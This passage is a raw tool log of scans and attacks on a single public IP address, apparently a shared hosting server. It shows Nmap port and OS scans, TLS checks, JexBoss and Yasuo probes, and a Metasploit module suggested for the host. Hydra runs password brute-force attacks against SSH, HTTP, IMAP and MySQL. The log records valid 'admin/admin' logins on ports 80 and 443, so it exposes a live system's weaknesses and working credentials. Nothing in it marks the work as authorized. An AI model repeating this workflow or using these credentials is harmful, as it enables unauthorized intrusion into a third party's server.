2153. By Sandro Gauci && Wendel G. Henrique
2154.  
2155. Checking http://173.237.136.21:8443
2156. Generic Detection results:
2157. No WAF detected by the generic detection
2158. Number of requests: 14
2159.  
2160. http://173.237.136.21:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
2161.  
2162. Version: 1.11.12-static
2163. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2164.  
2165. Connected to 173.237.136.21
2166.  
2167. Testing SSL server 173.237.136.21 on port 8443 using SNI name 173.237.136.21
2168.  
2169. TLS Fallback SCSV:
2170. Server supports TLS Fallback SCSV
2171.  
2172. TLS renegotiation:
2173. Secure session renegotiation supported
2174.  
2175. TLS Compression:
2176. Compression disabled
2177.  
2178. Heartbleed:
2179. TLS 1.2 not vulnerable to heartbleed
2180. TLS 1.1 not vulnerable to heartbleed
2181. TLS 1.0 not vulnerable to heartbleed
2182.  
2183. Supported Server Cipher(s):
2184. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2185. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2186. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2187. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2188. Accepted TLSv1.2 256 bits AES256-SHA256
2189. Accepted TLSv1.2 256 bits AES256-SHA
2190. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2191. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2192. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2193. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2194. Accepted TLSv1.2 128 bits AES128-SHA256
2195. Accepted TLSv1.2 128 bits AES128-SHA
2196. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2197. Accepted TLSv1.2 112 bits DES-CBC3-SHA
2198. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2199. Accepted TLSv1.1 256 bits AES256-SHA
2200. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2201. Accepted TLSv1.1 128 bits AES128-SHA
2202. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2203. Accepted TLSv1.1 112 bits DES-CBC3-SHA
2204. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2205. Accepted TLSv1.0 256 bits AES256-SHA
2206. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2207. Accepted TLSv1.0 128 bits AES128-SHA
2208. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2209. Accepted TLSv1.0 112 bits DES-CBC3-SHA
2210.  
2211. SSL Certificate:
2212. Signature Algorithm: sha256WithRSAEncryption
2213. RSA Key Strength: 2048
2214.  
2215. Subject: *.myserverhosts.com
2216. Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
2217. Issuer: COMODO RSA Domain Validation Secure Server CA
2218.  
2219. Not valid before: Jun 8 00:00:00 2018 GMT
2220. Not valid after: Jun 8 23:59:59 2020 GMT
2221.  
2222.  
2223.  
2224. AVAILABLE PLUGINS
2225. -----------------
2226.  
2227. PluginSessionResumption
2228. PluginOpenSSLCipherSuites
2229. PluginChromeSha1Deprecation
2230. PluginHeartbleed
2231. PluginSessionRenegotiation
2232. PluginCompression
2233. PluginCertInfo
2234. PluginHSTS
2235.  
2236.  
2237.  
2238. CHECKING HOST(S) AVAILABILITY
2239. -----------------------------
2240.  
2241. 173.237.136.21:8443 => 173.237.136.21:8443
2242.  
2243.  
2244.  
2245. SCAN RESULTS FOR 173.237.136.21:8443 - 173.237.136.21:8443
2246. ----------------------------------------------------------
2247.  
2248. * Deflate Compression:
2249. OK - Compression disabled
2250.  
2251. * Session Renegotiation:
2252. Client-initiated Renegotiations: OK - Rejected
2253. Secure Renegotiation: OK - Supported
2254.  
2255. * Certificate - Content:
2256. SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
2257. Common Name: *.myserverhosts.com
2258. Issuer: COMODO RSA Domain Validation Secure Server CA
2259. Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
2260. Not Before: Jun 8 00:00:00 2018 GMT
2261. Not After: Jun 8 23:59:59 2020 GMT
2262. Signature Algorithm: sha256WithRSAEncryption
2263. Public Key Algorithm: rsaEncryption
2264. Key Size: 2048 bit
2265. Exponent: 65537 (0x10001)
2266. X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
2267.  
2268. * Certificate - Trust:
2269. Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
2270. Google CA Store (09/2015): OK - Certificate is trusted
2271. Java 6 CA Store (Update 65): OK - Certificate is trusted
2272. Microsoft CA Store (09/2015): OK - Certificate is trusted
2273. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
2274. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
2275. Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
2276.  
2277. * Certificate - OCSP Stapling:
2278. NOT SUPPORTED - Server did not send back an OCSP response.
2279.  
2280. * Session Resumption:
2281. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
2282. With TLS Session Tickets: OK - Supported
2283.  
2284. * SSLV2 Cipher Suites:
2285. Server rejected all cipher suites.
2286.  
2287. * SSLV3 Cipher Suites:
2288. Undefined - An unexpected error happened:
2289. SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
2290. SRP-3DES-EDE-CBC-SHA timeout - timed out
2291. PSK-3DES-EDE-CBC-SHA timeout - timed out
2292. EXP-RC4-MD5 timeout - timed out
2293. EXP-RC2-CBC-MD5 timeout - timed out
2294. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
2295. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
2296. EXP-DES-CBC-SHA timeout - timed out
2297. EXP-ADH-RC4-MD5 timeout - timed out
2298. EXP-ADH-DES-CBC-SHA timeout - timed out
2299. EDH-RSA-DES-CBC3-SHA timeout - timed out
2300. EDH-RSA-DES-CBC-SHA timeout - timed out
2301. EDH-DSS-DES-CBC3-SHA timeout - timed out
2302. EDH-DSS-DES-CBC-SHA timeout - timed out
2303. ECDHE-RSA-NULL-SHA timeout - timed out
2304. ECDHE-ECDSA-NULL-SHA timeout - timed out
2305. ECDH-RSA-NULL-SHA timeout - timed out
2306. ECDH-RSA-DES-CBC3-SHA timeout - timed out
2307. ECDH-ECDSA-NULL-SHA timeout - timed out
2308. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
2309. DH-RSA-DES-CBC3-SHA timeout - timed out
2310. DH-RSA-DES-CBC-SHA timeout - timed out
2311. DH-DSS-DES-CBC3-SHA timeout - timed out
2312. DH-DSS-DES-CBC-SHA timeout - timed out
2313. DES-CBC3-SHA timeout - timed out
2314. DES-CBC-SHA timeout - timed out
2315. AECDH-NULL-SHA timeout - timed out
2316. AECDH-DES-CBC3-SHA timeout - timed out
2317. ADH-DES-CBC3-SHA timeout - timed out
2318. ADH-DES-CBC-SHA timeout - timed out
2319.  
2320.  
2321. #######################################################################################################################################
2322.  
2323.  
2324.  
2325. * --- JexBoss: Jboss verify and EXploitation Tool --- *
2326. | * And others Java Deserialization Vulnerabilities * |
2327. | |
2328. | @author: João Filho Matos Figueiredo |
2329. | @contact: joaomatosf@gmail.com |
2330. | |
2331. | @update: https://github.com/joaomatosf/jexboss |
2332. #______________________________________________________#
2333.  
2334. @version: 1.2.4
2335.  
2336. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2337.  
2338.  
2339. ** Checking Host: https://173.237.136.21:8443 **
2340.  
2341. [*] Checking admin-console: [ OK ]
2342. [*] Checking Struts2: [ OK ]
2343. [*] Checking Servlet Deserialization: [ OK ]
2344. [*] Checking Application Deserialization: [ OK ]
2345. [*] Checking Jenkins: [ OK ]
2346. [*] Checking web-console: [ OK ]
2347. [*] Checking jmx-console: [ OK ]
2348. [*] Checking JMXInvokerServlet: [ OK ]
2349.  
2350.  
2351. * Results:
2352. The server is not vulnerable to bugs tested ... :D
2353.  
2354. * Info: review, suggestions, updates, etc:
2355. https://github.com/joaomatosf/jexboss
2356.  
2357. * DONATE: Please consider making a donation to help improve this tool,
2358. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
2359.  
2360. #######################################################################################################################################
2361.  
2362. I, [2018-11-23T00:16:41.569567 #12203] INFO -- : Initiating port scan
2363. I, [2018-11-23T00:17:42.345289 #12203] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-16-41.xml
2364. I, [2018-11-23T00:17:42.346515 #12203] INFO -- : Discovered open port: 173.237.136.21:80
2365. I, [2018-11-23T00:17:43.324894 #12203] INFO -- : Discovered open port: 173.237.136.21:443
2366. I, [2018-11-23T00:17:45.121214 #12203] INFO -- : Discovered open port: 173.237.136.21:465
2367. I, [2018-11-23T00:17:46.524137 #12203] INFO -- : Discovered open port: 173.237.136.21:993
2368. I, [2018-11-23T00:17:48.741643 #12203] INFO -- : Discovered open port: 173.237.136.21:995
2369. I, [2018-11-23T00:17:50.962609 #12203] INFO -- : Discovered open port: 173.237.136.21:8443
2370. I, [2018-11-23T00:17:52.776201 #12203] INFO -- : <<<Enumerating vulnerable applications>>>
2371.  
2372.  
2373. --------------------------------------------------------
2374. <<<Yasuo discovered following vulnerable applications>>>
2375. --------------------------------------------------------
2376. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
2377. | App Name | URL to Application | Potential Exploit | Username | Password |
2378. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
2379. | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
2380. | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
2381. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
2382. #######################################################################################################################################
2383. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:21 EST
2384. NSE: Loaded 148 scripts for scanning.
2385. NSE: Script Pre-scanning.
2386. Initiating NSE at 00:22
2387. Completed NSE at 00:22, 0.00s elapsed
2388. Initiating NSE at 00:22
2389. Completed NSE at 00:22, 0.00s elapsed
2390. Initiating Parallel DNS resolution of 1 host. at 00:22
2391. Completed Parallel DNS resolution of 1 host. at 00:22, 16.51s elapsed
2392. Initiating SYN Stealth Scan at 00:22
2393. Scanning 173.237.136.21 [474 ports]
2394. Discovered open port 80/tcp on 173.237.136.21
2395. Discovered open port 993/tcp on 173.237.136.21
2396. Discovered open port 3306/tcp on 173.237.136.21
2397. Discovered open port 53/tcp on 173.237.136.21
2398. Discovered open port 22/tcp on 173.237.136.21
2399. Discovered open port 143/tcp on 173.237.136.21
2400. Discovered open port 587/tcp on 173.237.136.21
2401. Discovered open port 995/tcp on 173.237.136.21
2402. Discovered open port 110/tcp on 173.237.136.21
2403. Discovered open port 21/tcp on 173.237.136.21
2404. Discovered open port 443/tcp on 173.237.136.21
2405. Discovered open port 8080/tcp on 173.237.136.21
2406. Discovered open port 465/tcp on 173.237.136.21
2407. Discovered open port 8443/tcp on 173.237.136.21
2408. Completed SYN Stealth Scan at 00:22, 4.55s elapsed (474 total ports)
2409. Initiating Service scan at 00:22
2410. Scanning 14 services on 173.237.136.21
2411. Completed Service scan at 00:22, 33.92s elapsed (14 services on 1 host)
2412. Initiating OS detection (try #1) against 173.237.136.21
2413. Retrying OS detection (try #2) against 173.237.136.21
2414. WARNING: OS didn't match until try #2
2415. Initiating Traceroute at 00:23
2416. Completed Traceroute at 00:23, 0.22s elapsed
2417. Initiating Parallel DNS resolution of 2 hosts. at 00:23
2418. Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
2419. NSE: Script scanning 173.237.136.21.
2420. Initiating NSE at 00:23
2421. Completed NSE at 00:25, 140.31s elapsed
2422. Initiating NSE at 00:25
2423. Completed NSE at 00:25, 0.46s elapsed
2424. Nmap scan report for 173.237.136.21
2425. Host is up (0.13s latency).
2426. Not shown: 457 closed ports
2427. PORT STATE SERVICE VERSION
2428. 21/tcp open ftp Pure-FTPd
2429. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
2430. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
2431. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
2432. | Public Key type: rsa
2433. | Public Key bits: 2048
2434. | Signature Algorithm: sha256WithRSAEncryption
2435. | Not valid before: 2018-05-03T00:00:00
2436. | Not valid after: 2019-05-03T23:59:59
2437. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
2438. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
2439. |_ssl-date: 2018-11-23T05:23:22+00:00; 0s from scanner time.
2440. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2441. | ssh-hostkey:
2442. | 1024 cc:18:eb:be:f1:bf:95:33:27:e7:9d:46:4b:f7:5e:51 (DSA)
2443. |_ 2048 02:20:0f:ee:ae:39:1e:aa:8c:36:e5:00:af:2f:43:ff (RSA)
2444. 23/tcp filtered telnet
2445. 53/tcp open domain?
2446. 80/tcp open http-proxy Squid http proxy
2447. | http-methods:
2448. |_ Supported Methods: GET HEAD POST OPTIONS
2449. |_http-open-proxy: Proxy might be redirecting requests
2450. |_http-title: Site doesn't have a title (text/html).
2451. 110/tcp open pop3 Dovecot pop3d
2452. |_pop3-capabilities: CAPA UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP STLS AUTH-RESP-CODE RESP-CODES
2453. |_ssl-date: 2018-11-23T05:23:25+00:00; 0s from scanner time.
2454. 143/tcp open imap Dovecot imapd
2455. |_imap-capabilities: LITERAL+ listed ENABLE IDLE NAMESPACE LOGIN-REFERRALS Pre-login capabilities post-login ID SASL-IR have OK AUTH=LOGINA0001 AUTH=PLAIN more STARTTLS IMAP4rev1
2456. |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
2457. 443/tcp open ssl/http nginx 1.14.0
2458. | http-methods:
2459. |_ Supported Methods: GET HEAD POST OPTIONS
2460. |_http-server-header: nginx/1.14.0
2461. |_http-title: Site doesn't have a title (text/html).
2462. | ssl-cert: Subject: commonName=*.myserverhosts.com
2463. | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
2464. | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
2465. | Public Key type: rsa
2466. | Public Key bits: 2048
2467. | Signature Algorithm: sha256WithRSAEncryption
2468. | Not valid before: 2018-06-08T00:00:00
2469. | Not valid after: 2020-06-08T23:59:59
2470. | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
2471. |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
2472. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
2473. | tls-nextprotoneg:
2474. | h2
2475. |_ http/1.1
2476. 465/tcp open ssl/smtp Exim smtpd 4.91
2477. |_smtp-commands: Couldn't establish connection on port 465
2478. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
2479. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
2480. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
2481. | Public Key type: rsa
2482. | Public Key bits: 2048
2483. | Signature Algorithm: sha256WithRSAEncryption
2484. | Not valid before: 2018-05-03T00:00:00
2485. | Not valid after: 2019-05-03T23:59:59
2486. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
2487. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
2488. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
2489. 587/tcp open smtp Exim smtpd 4.91
2490. | smtp-commands: uscentral22.myserverhosts.com Hello nmap.scanme.org [185.244.213.149], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
2491. |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
2492. | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
2493. | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
2494. | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
2495. | Public Key type: rsa
2496. | Public Key bits: 2048
2497. | Signature Algorithm: sha256WithRSAEncryption
2498. | Not valid before: 2018-05-03T00:00:00
2499. | Not valid after: 2019-05-03T23:59:59
2500. | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
2501. |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
2502. |_ssl-date: 2018-11-23T05:23:20+00:00; 0s from scanner time.
2503. 993/tcp open ssl/imaps?
2504. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
2505. 995/tcp open ssl/pop3s?
2506. |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
2507. 3306/tcp open mysql MySQL 5.5.51-38.2
2508. | mysql-info:
2509. | Protocol: 10
2510. | Version: 5.5.51-38.2
2511. | Thread ID: 34070279
2512. | Capabilities flags: 63487
2513. | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsTransactions, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
2514. | Status: Autocommit
2515. | Salt: fCYt__?Z)YfwC)BOFQC;
2516. |_ Auth Plugin Name: 84
2517. 7777/tcp filtered cbt
2518. 8080/tcp open http nginx 1.14.0
2519. | http-methods:
2520. |_ Supported Methods: GET HEAD POST OPTIONS
2521. |_http-server-header: nginx/1.14.0
2522. |_http-title: Site doesn't have a title (text/html).
2523. 8443/tcp open ssl/http nginx 1.14.0
2524. | http-methods:
2525. |_ Supported Methods: GET HEAD POST OPTIONS
2526. |_http-server-header: nginx/1.14.0
2527. |_http-title: Site doesn't have a title (text/html).
2528. | ssl-cert: Subject: commonName=*.myserverhosts.com
2529. | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
2530. | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
2531. | Public Key type: rsa
2532. | Public Key bits: 2048
2533. | Signature Algorithm: sha256WithRSAEncryption
2534. | Not valid before: 2018-06-08T00:00:00
2535. | Not valid after: 2020-06-08T23:59:59
2536. | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
2537. |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
2538. |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
2539. | tls-nextprotoneg:
2540. | h2
2541. |_ http/1.1
2542. 49152/tcp filtered unknown
2543. Device type: WAP|router|storage-misc
2544. Running: Linux 2.4.X|2.6.X, MikroTik RouterOS 5.X, Netgear RAIDiator 4.X
2545. OS CPE: cpe:/o:linux:linux_kernel:2.4.36 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35 cpe:/o:netgear:raidiator:4.1.4
2546. OS details: DD-WRT v23 (Linux 2.4.36), MikroTik RouterOS 5.25 (Linux 2.6.35), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4)
2547. Uptime guess: 301.013 days (since Fri Jan 26 00:07:11 2018)
2548. Network Distance: 2 hops
2549. Service Info: Host: uscentral22.myserverhosts.com
2550.  
2551. TRACEROUTE (using port 25/tcp)
2552. HOP RTT ADDRESS
2553. 1 103.19 ms 10.251.200.1
2554. 2 103.15 ms 173.237.136.21
2555.  
2556. NSE: Script Post-scanning.
2557. Initiating NSE at 00:25
2558. Completed NSE at 00:25, 0.00s elapsed
2559. Initiating NSE at 00:25
2560. Completed NSE at 00:25, 0.00s elapsed
2561. Read data files from: /usr/bin/../share/nmap
2562. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2563. Nmap done: 1 IP address (1 host up) scanned in 218.42 seconds
2564. Raw packets sent: 599 (28.512KB) | Rcvd: 556 (25.098KB)
2565. #######################################################################################################################################
2566. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:25 EST
2567. NSE: Loaded 148 scripts for scanning.
2568. NSE: Script Pre-scanning.
2569. Initiating NSE at 00:25
2570. Completed NSE at 00:25, 0.00s elapsed
2571. Initiating NSE at 00:25
2572. Completed NSE at 00:25, 0.00s elapsed
2573. Initiating Parallel DNS resolution of 1 host. at 00:25
2574. Completed Parallel DNS resolution of 1 host. at 00:25, 16.50s elapsed
2575. Initiating UDP Scan at 00:25
2576. Scanning 173.237.136.21 [14 ports]
2577. Discovered open port 53/udp on 173.237.136.21
2578. Completed UDP Scan at 00:26, 6.57s elapsed (14 total ports)
2579. Initiating Service scan at 00:26
2580. Scanning 1 service on 173.237.136.21
2581. Completed Service scan at 00:26, 15.02s elapsed (1 service on 1 host)
2582. Initiating OS detection (try #1) against 173.237.136.21
2583. Retrying OS detection (try #2) against 173.237.136.21
2584. Initiating Traceroute at 00:26
2585. Completed Traceroute at 00:26, 7.16s elapsed
2586. Initiating Parallel DNS resolution of 1 host. at 00:26
2587. Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
2588. NSE: Script scanning 173.237.136.21.
2589. Initiating NSE at 00:26
2590. Completed NSE at 00:26, 0.45s elapsed
2591. Initiating NSE at 00:26
2592. Completed NSE at 00:26, 0.00s elapsed
2593. Nmap scan report for 173.237.136.21
2594. Host is up (0.21s latency).
2595.  
2596. PORT STATE SERVICE VERSION
2597. 53/udp open domain (generic dns response: FORMERR)
2598. | fingerprint-strings:
2599. | NBTStat:
2600. |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2601. 67/udp closed dhcps
2602. 68/udp closed dhcpc
2603. 69/udp closed tftp
2604. 88/udp closed kerberos-sec
2605. 123/udp closed ntp
2606. 137/udp filtered netbios-ns
2607. 138/udp filtered netbios-dgm
2608. 139/udp closed netbios-ssn
2609. 161/udp closed snmp
2610. 162/udp closed snmptrap
2611. 389/udp closed ldap
2612. 520/udp closed route
2613. 2049/udp closed nfs
2614. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
2615. SF-Port53-UDP:V=7.70%I=7%D=11/23%Time=5BF78F6F%P=x86_64-pc-linux-gnu%r(DNS
2616. SF:VersionBindReq,C,"\0\x06\x81\x04\0\0\0\0\0\0\0\0")%r(DNSStatusRequest,C
2617. SF:,"\0\0\x90\x01\0\0\0\0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x05\0\x01\0
2618. SF:\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
2619. Too many fingerprints match this host to give specific OS details
2620. Network Distance: 12 hops
2621.  
2622. TRACEROUTE (using port 138/udp)
2623. HOP RTT ADDRESS
2624. 1 ... 2
2625. 3 102.71 ms 10.251.200.1
2626. 4 ... 5
2627. 6 104.13 ms 10.251.200.1
2628. 7 105.10 ms 10.251.200.1
2629. 8 105.09 ms 10.251.200.1
2630. 9 105.08 ms 10.251.200.1
2631. 10 105.05 ms 10.251.200.1
2632. 11 104.87 ms 10.251.200.1
2633. 12 104.87 ms 10.251.200.1
2634. 13 ... 18
2635. 19 103.61 ms 10.251.200.1
2636. 20 104.32 ms 10.251.200.1
2637. 21 103.29 ms 10.251.200.1
2638. 22 ... 29
2639. 30 104.00 ms 10.251.200.1
2640.  
2641. NSE: Script Post-scanning.
2642. Initiating NSE at 00:26
2643. Completed NSE at 00:26, 0.00s elapsed
2644. Initiating NSE at 00:26
2645. Completed NSE at 00:26, 0.00s elapsed
2646. Read data files from: /usr/bin/../share/nmap
2647. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2648. Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds
2649. Raw packets sent: 124 (5.705KB) | Rcvd: 91 (8.627KB)
2650. #######################################################################################################################################
2651. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:26 EST
2652. Nmap scan report for 173.237.136.21
2653. Host is up (0.20s latency).
2654. Not shown: 16 closed ports, 1 filtered port
2655. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2656. PORT STATE SERVICE
2657. 21/tcp open ftp
2658. 22/tcp open ssh
2659. 53/tcp open domain
2660. 80/tcp open http
2661. 110/tcp open pop3
2662. 443/tcp open https
2663. 993/tcp open imaps
2664. 3306/tcp open mysql
2665. 8080/tcp open http-proxy
2666. #######################################################################################################################################
2667. 1 of 1 target completed, 0 valid passwords found
2668. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:42
2669. + -- --=[Port 22 opened... running tests...
2670. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2671.  
2672. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
2673. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
2674. [DATA] attacking ssh://173.237.136.21:22/
2675. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2676.  
2677. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
2678. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
2679. [DATA] attacking ssh://173.237.136.21:22/
2680. + -- --=[Port 23 closed... skipping.
2681. + -- --=[Port 25 closed... skipping.
2682. + -- --=[Port 80 opened... running tests...
2683. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2684.  
2685. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:43
2686. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
2687. [DATA] attacking http-get://173.237.136.21:80//
2688. [80][http-get] host: 173.237.136.21 login: admin password: admin
2689. [STATUS] attack finished for 173.237.136.21 (valid pair found)
2690. 1 of 1 target successfully completed, 1 valid password found
2691. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:44
2692. + -- --=[Port 110 opened... running tests...
2693. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2694.  
2695. + -- --=[Port 443 opened... running tests...
2696. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2697.  
2698. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:08:48
2699. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
2700. [DATA] attacking http-gets://173.237.136.21:443//
2701. [443][http-get] host: 173.237.136.21 login: admin password: admin
2702. [STATUS] attack finished for 173.237.136.21 (valid pair found)
2703. 1 of 1 target successfully completed, 1 valid password found
2704. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:08:49
2705. + -- --=[Port 445 closed... skipping.
2706. + -- --=[Port 512 closed... skipping.
2707. + -- --=[Port 513 closed... skipping.
2708. + -- --=[Port 514 closed... skipping.
2709. + -- --=[Port 993 opened... running tests...
2710. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2711.  
2712. 1 of 1 target completed, 0 valid passwords found
2713. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 15:59:55
2714. + -- --=[Port 1433 closed... skipping.
2715. + -- --=[Port 1521 closed... skipping.
2716. + -- --=[Port 3306 opened... running tests...
2717. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2718.  
2719. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 15:59:55
2720. [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
2721. [DATA] attacking mysql://173.237.136.21:3306/
2722. [STATUS] 50.00 tries/min, 50 tries in 00:01h, 28 to do in 00:01h, 1 active
2723. 1 of 1 target completed, 0 valid passwords found
2724. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:00:55
2725. + -- --=[Port 3389 closed... skipping.
2726. + -- --=[Port 5432 closed... skipping.
2727. + -- --=[Port 5900 closed... skipping.
2728. + -- --=[Port 5901 closed... skipping.
2729. + -- --=[Port 8000 closed... skipping.
2730. + -- --=[Port 8080 opened... running tests...
2731. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2732. #######################################################################################################################################
